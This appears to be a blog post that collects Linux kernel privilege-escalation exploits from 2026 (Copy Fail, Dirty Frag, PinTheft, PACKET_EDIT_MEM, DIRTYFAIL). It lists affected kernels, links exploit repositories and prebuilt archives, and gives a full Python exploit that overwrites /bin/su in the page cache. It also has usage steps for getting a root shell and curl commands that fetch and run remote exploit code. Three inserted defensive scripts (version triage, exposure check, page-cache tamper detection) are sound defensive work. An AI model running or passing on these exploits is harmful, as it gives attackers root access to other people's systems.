Over the past two months, CoW-based LPEs have been popping up one after another. I have long wanted to write a complete LPE collection that lists each CVE and its applicable range clearly; having to dig them up again every time I need one is just too much hassle.
Copy Fail (CVE-2026-31431)
Affected versions
- 6.12: < 6.12.85
- 6.6: < 6.6.137
- 6.1: < 6.1.170
- 5.15: < 5.15.204
- 5.10: < 5.10.254

Exploit
Official exploit one-liner:
```shell
curl https://copy.fail/exp | python3 && su
```

However, `os.splice()` only exists in Python 3.10 and newer, and the code is golfed to the point that portability suffers. The following exploit is recommended instead:
```python
#!/usr/bin/env python3
# This version utilizes ctypes as a drop in for 'splice()'
# for exploiting systems with python > 3.10.
import os as g,zlib,socket as s
import ctypes
libc = ctypes.CDLL("libc.so.6", use_errno=True)
_splice = libc.splice
_splice.argtypes = [ ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint]
def splice(fd_in, fd_out, count, offset_src=None, flags=0):
    off_in = None
    if offset_src is not None:
        off_in = ctypes.pointer(ctypes.c_long(offset_src))
    res = _splice(fd_in, off_in, fd_out, None, count, flags)
    if res < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
    return res
def d(x):return bytes.fromhex(x)
def c(f,t,c):
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o)
    try:u.recv(8+t)
    except:0
try:f=g.open("/bin/su",0)
except:f=g.open("/usr/bin/su",0)
i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
```

Copy Fail + K8S attack surface
I found a PoC; it is not yet verified, but it should work. Repo: https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC
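Checking a host against the Copy Fail stable ranges listed under Affected versions above means parsing `uname -r` and comparing only the leading upstream version. The following Python is an added example written for this post, not code from the post or from any exploit author; the ranges are the ones given above, and the `uname -r` strings are constructed samples in the style of the distro kernels listed later in this post.

```python
"""Kernel-version triage against the Copy Fail (CVE-2026-31431) stable ranges.

Added example, not from the post's author. FIXED_IN holds the ranges the
post lists; SAMPLES are constructed `uname -r` strings.
"""
import re

# Stable series -> first fixed patch level, exactly as listed in the post.
FIXED_IN = {
    (6, 12): (6, 12, 85),
    (6, 6): (6, 6, 137),
    (6, 1): (6, 1, 170),
    (5, 15): (5, 15, 204),
    (5, 10): (5, 10, 254),
}

_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_release(uname_r):
    """Return (major, minor, patch) from a `uname -r` string.

    Distro suffixes such as '-23-generic', '-124.49.1.el10_1.x86_64' or
    '+deb13.1' are ignored; only the leading upstream version is used.
    """
    m = _VER_RE.match(uname_r.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {uname_r!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def triage(uname_r):
    """Classify a kernel against the listed upstream ranges.

    Returns one of:
      'below-fix'  - series is listed and the patch level is below the fix
      'fixed'      - series is listed and the patch level is at/above the fix
      'not-listed' - series not in the post's table (e.g. 6.17, 7.0); consult
                     the distro advisory instead

    Distro kernels backport fixes without bumping the upstream patch level,
    so 'below-fix' means "check the distro advisory", not "exploitable".
    """
    v = parse_release(uname_r)
    series = v[:2]
    if series not in FIXED_IN:
        return "not-listed"
    return "below-fix" if v < FIXED_IN[series] else "fixed"


# Constructed sample releases mirroring the formats seen in this post.
SAMPLES = [
    "6.12.0-124.49.1.el10_1.x86_64",  # RHEL-style: 6.12.0 < 6.12.85 by number only
    "6.12.90+deb13.1",                # Debian-style: 6.12.90 >= 6.12.85
    "6.6.140",
    "6.1.169",
    "5.15.204",
    "6.17.0-23-generic",              # not in the table at all
]

if __name__ == "__main__":
    for r in SAMPLES:
        print(f"{r:34s} {triage(r)}")
```

The upstream comparison is only a first pass: an enterprise kernel such as 6.12.0-124.x carries backported fixes without changing its upstream number, and mainline-derived kernels (6.17, 7.0, ...) are outside the table entirely, so the distro advisory is the authoritative answer in both cases.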
Dirty Frag (CVE-2026-43284 (xfrm/ESP) + CVE-2026-43500 (RxRPC))
Also known as Copy_Fail2. It is the same class of bug as CVE-2026-31431, but in different subsystems (XFRM/ESP | RxRPC).
Affected versions
- Ubuntu 24.04.4: 6.17.0-23-generic
- RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
- openSUSE Tumbleweed: 7.0.2-1-default
- CentOS Stream 10: 6.12.0-224.el10.x86_64
- AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
- Fedora 44: 6.19.14-300.fc44.x86_64

Exploit
- C implementation: https://github.com/v4bel/dirtyfrag
- C implementation: https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
- Python implementation: https://github.com/guiimoraes/CVE-2026-31431
- C implementation, click to download: dirtyfrag.zip (statically compiled).
```text
(ctf) ➜ tmp tree dirtyfrag
dirtyfrag
├── assets
│   ├── demo.gif
│   ├── tux.png
│   └── write-up.md
├── exp
├── exp.c
└── README.md

2 directories, 6 files
```

Usage:
```shell
./exp && id
# restore the polluted page cache
echo 3 > /proc/sys/vm/drop_caches
```

Another C implementation; you can download it directly: Copy_Fail2-Electric_Boogaloo.zip, already statically compiled (OrbStack Ubuntu, GLIBC 2.39-0ubuntu8.7).
```text
(ctf) ➜ tmp tree Copy_Fail2-Electric_Boogaloo
Copy_Fail2-Electric_Boogaloo
├── aa-rootns
├── aa-rootns.c
├── copyfail2
├── copyfail2.c
├── ipv6
│   ├── copyfail2v6.c
│   └── run.sh
├── README.md
└── run.sh

2 directories, 8 files
```

Usage:
```shell
./run.sh           # install + drop into root shell
./run.sh --clean   # revert /etc/passwd via the same primitive
```

If it still fails (a static build should not have problems), try building it yourself:
```shell
sudo apt install -y libssl-dev gcc
gcc -O2 -Wall copyfail2.c -o copyfail2 -lcrypto
gcc -O2 -Wall aa-rootns.c -o aa-rootns
```

Python has a one-liner as well, but on Ubuntu with apparmor_restrict_unprivileged_userns enabled you have to save it to a file first and then run it; piping it into the interpreter does not work:
```shell
curl -sL https://raw.githubusercontent.com/guiimoraes/copyfail2-py/main/exploit.py > /tmp/x.py
python3 /tmp/x.py
```

PinTheft (CVE-2026-43494 | requires RDS enabled)
This one is of little practical use, but it belongs to the series, so I am collecting it too. Not vulnerable by default on most distros (RDS is rarely enabled).
Affected versions
- Kernel with CONFIG_RDS and CONFIG_RDS_TCP enabled
- io_uring enabled (kernel.io_uring_disabled=0)
- Kernel ≥ 6.13 (for optimal io_uring features)
- At least one readable SUID-root binary on the system
- x86_64 architecture
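Since the preconditions above are all host-configuration facts, the exposure of a fleet can be audited without running any PoC. The following Python is an added example, not code from the post or the exploit repository: it reads the kernel build config and the `kernel.io_uring_disabled` sysctl the post names, and prints the standard mitigations (blacklisting the `rds` module, setting `kernel.io_uring_disabled`). The config snippets and sysctl values it is demonstrated on are constructed.

```python
"""Exposure check for the PinTheft (CVE-2026-43494) preconditions.

Added example, not from the post or the exploit author. Pure functions take
the config text and sysctl value so the logic can be exercised on the
constructed samples below; read_live() applies it to the current host.
"""
import platform


def parse_kconfig(config_text):
    """Turn a /boot/config-* file into {CONFIG_X: value}; '# ... is not set' lines are skipped."""
    opts = {}
    for line in config_text.splitlines():
        line = line.strip()
        if line.startswith("CONFIG_") and "=" in line:
            key, value = line.split("=", 1)
            opts[key] = value
    return opts


def rds_enabled(config_text):
    """True if RDS and RDS_TCP are built in (y) or available as modules (m).

    A module counts: an unprivileged AF_RDS socket() auto-loads it unless
    the module is blacklisted.
    """
    opts = parse_kconfig(config_text)
    return opts.get("CONFIG_RDS") in ("y", "m") and opts.get("CONFIG_RDS_TCP") in ("y", "m")


def io_uring_usable(io_uring_disabled_value):
    """kernel.io_uring_disabled: 0 = enabled for everyone, 1 = restricted, 2 = disabled."""
    return io_uring_disabled_value.strip() == "0"


def assess(config_text, io_uring_disabled_value, machine):
    """Combine the post's preconditions into an exposure verdict plus advice."""
    prereqs = {
        "rds": rds_enabled(config_text),
        "io_uring": io_uring_usable(io_uring_disabled_value),
        "x86_64": machine == "x86_64",
    }
    advice = []
    if prereqs["rds"]:
        advice.append("blacklist RDS: echo 'install rds /bin/false' > /etc/modprobe.d/rds.conf (only works if RDS is a module)")
    if prereqs["io_uring"]:
        advice.append("sysctl -w kernel.io_uring_disabled=2 (or 1 to restrict io_uring to privileged users)")
    return {"prereqs": prereqs, "exposed": all(prereqs.values()), "advice": advice}


def read_live():
    """Assess the running host; returns None if the build config is not readable."""
    try:
        with open(f"/boot/config-{platform.release()}") as fh:
            config_text = fh.read()
    except OSError:
        return None
    try:
        with open("/proc/sys/kernel/io_uring_disabled") as fh:
            value = fh.read()
    except OSError:
        value = "0"  # sysctl absent before 6.6: io_uring cannot be disabled there
    return assess(config_text, value, platform.machine())


# Constructed sample inputs.
SAMPLE_CONFIG_ON = "CONFIG_RDS=m\nCONFIG_RDS_TCP=m\n# CONFIG_RDS_DEBUG is not set\n"
SAMPLE_CONFIG_OFF = "# CONFIG_RDS is not set\n# CONFIG_RDS_TCP is not set\n"

if __name__ == "__main__":
    print("sample (RDS on, io_uring on):", assess(SAMPLE_CONFIG_ON, "0\n", "x86_64"))
    print("sample (RDS on, io_uring off):", assess(SAMPLE_CONFIG_ON, "2\n", "x86_64"))
    print("this host:", read_live())
```

Blacklisting only helps when RDS is built as a module; a kernel with `CONFIG_RDS=y` needs the io_uring sysctl or a kernel update instead, and the sysctl itself only exists from 6.6 onward.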
Exploit
Repo: https://github.com/0xBlackash/CVE-2026-43494.git
```shell
# 1. Clone & Compile
git clone https://github.com/0xBlackash/CVE-2026-43494.git
cd CVE-2026-43494
gcc -O2 -static CVE-2026-43494.c -o pintheft

# 2. Run
sudo ./pintheft
```

PACKET_EDIT_MEM (CVE-2026-46331 | 2026/06/17)
Affected versions (< v7.1-rc7)
| Distro | Kernel | Flag | Result |
|---|---|---|---|
| RHEL 10.0 | 6.12.0-228.el10 | (none) | ROOT |
| Debian 13 trixie | 6.12.90+deb13.1 | (none) | ROOT |
| Ubuntu 24.04.4 | 6.17.0-22 | --ubuntu | ROOT |
| Ubuntu 26.04 | 7.0.0-14-generic | --ubuntu | FAIL |
That table is from the official repo; in my own test, Ubuntu 24.04.4 with 6.17.0-35-generic also works, so any nearby version is worth trying.

Exploit
Official repo: https://github.com/sgkdev/packet_edit_meme
Precompiled archive (static build): packet_edit_meme.zip
```text
(ctf) ➜ tmp tree packet_edit_meme
packet_edit_meme
├── Makefile
├── packet_edit_meme
├── packet_edit_meme.c
├── pedit_primitive.c
├── pedit_primitive.h
├── README.md
├── test_cve
└── test_cve.c

1 directory, 8 files
```

Note: Ubuntu has an AppArmor gate, so the aa-exec bypass has to be used first. That has some preconditions, but on a fully installed Ubuntu it will most likely work as-is.
Usage:

```shell
make
./packet_edit_meme
./packet_edit_meme --ubuntu   # AppArmor-gated Ubuntu: aa-exec bypass first
```

DIRTYFAIL (collection)
This is not a single PoC; it is a "Detector + PoC for Linux page-cache write vulnerabilities: Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284/43500)".
A very comprehensive tool, handy for testing and quick verification; the official repo is here: https://github.com/KaraZajac/DIRTYFAIL.git.
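The bugs DIRTYFAIL covers, like the others in this collection, write into the page cache without touching the disk, which is why `echo 3 > /proc/sys/vm/drop_caches` (shown in the Dirty Frag usage above) undoes the change. That property gives a simple detection idea: hash a file as ordinary readers see it (through the page cache) and again with O_DIRECT (which reads the disk blocks), and compare. The following Python is an added example of that idea, not part of DIRTYFAIL or of any PoC in the post; it assumes Linux and a filesystem that honours O_DIRECT, and the temp-file self-check uses constructed contents.

```python
"""Page-cache vs on-disk consistency check.

Added example, not part of DIRTYFAIL or any exploit in the post. A page-cache
write leaves the disk untouched, so the O_DIRECT digest stays clean while the
cached digest changes; a genuine on-disk modification changes both.
"""
import hashlib
import mmap
import os
import tempfile

CHUNK = 1 << 20  # 1 MiB: a multiple of any logical block size O_DIRECT may require
O_DIRECT = getattr(os, "O_DIRECT", None)  # Linux only


def sha256_cached(path):
    """Hash the file the way every normal reader sees it: through the page cache."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def sha256_direct(path):
    """Hash the on-disk bytes via O_DIRECT; None if unsupported here.

    O_DIRECT needs an aligned buffer and length, so reads go into an
    anonymous, page-aligned mmap. tmpfs/overlay/network filesystems may
    reject O_DIRECT with EINVAL at open or at read; both yield None.
    """
    if O_DIRECT is None:
        return None
    try:
        fd = os.open(path, os.O_RDONLY | O_DIRECT)
    except OSError:
        return None
    h = hashlib.sha256()
    buf = mmap.mmap(-1, CHUNK)
    try:
        while True:
            try:
                n = os.readv(fd, [buf])
            except OSError:
                return None
            if n == 0:
                break
            h.update(buf[:n])
    finally:
        buf.close()
        os.close(fd)
    return h.hexdigest()


def check(path):
    """Compare both views; page_cache_tampered is None when O_DIRECT is unavailable."""
    cached = sha256_cached(path)
    direct = sha256_direct(path)
    tampered = None if direct is None else (cached != direct)
    return {"path": path, "cached": cached, "direct": direct, "page_cache_tampered": tampered}


def self_test_on_temp_file():
    """Constructed input: an untampered temp file must hash identically both ways."""
    data = b"constructed sample contents\n" * 1000
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(data)
        path = tmp.name
    try:
        result = check(path)
        result["expected"] = hashlib.sha256(data).hexdigest()
        return result
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(self_test_on_temp_file())
    # The binaries the PoCs above target are the natural things to audit.
    for p in ("/bin/su", "/usr/bin/su"):
        if os.path.exists(p):
            print(check(p))
```

Package verification (`dpkg -V`, `rpm -V`) reads through the cache too, so it also flags a tainted `su`, but it cannot tell a page-cache-only change from a real disk change; the direct/cached comparison can, and a mismatch that disappears after `echo 3 > /proc/sys/vm/drop_caches` is the signature of this bug class.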
Affected versions
| CVE / variant | Name | DIRTYFAIL coverage |
|---|---|---|
| CVE-2026-31431 | Copy Fail (algif_aead authencesn page-cache write) | Detect + full PoC |
| CVE-2026-43284 v4 | Dirty Frag — IPv4 xfrm-ESP page-cache write | Detect + full PoC |
| CVE-2026-43284 v6 | Dirty Frag — IPv6 xfrm-ESP page-cache write (esp6) | Detect + full PoC |
| CVE-2026-43500 | Dirty Frag — RxRPC page-cache write | Detect + full PoC |
| Copy Fail GCM variant | xfrm-ESP rfc4106(gcm(aes)) page-cache write | Detect + full PoC |
Exploit
You can build it yourself from the official repo. Here is a precompiled archive (static build):
Click to download: DIRTYFAIL.zip
```text
(ctf) ➜ tmp tree -L 1 DIRTYFAIL
DIRTYFAIL
├── build
├── dirtyfail
├── docs
├── LICENSE
├── Makefile
├── NOTICE.md
├── README.md
├── src
├── tests
└── tools

6 directories, 5 files
```

Usage: `./dirtyfail --help`
Some of this information may be out of date.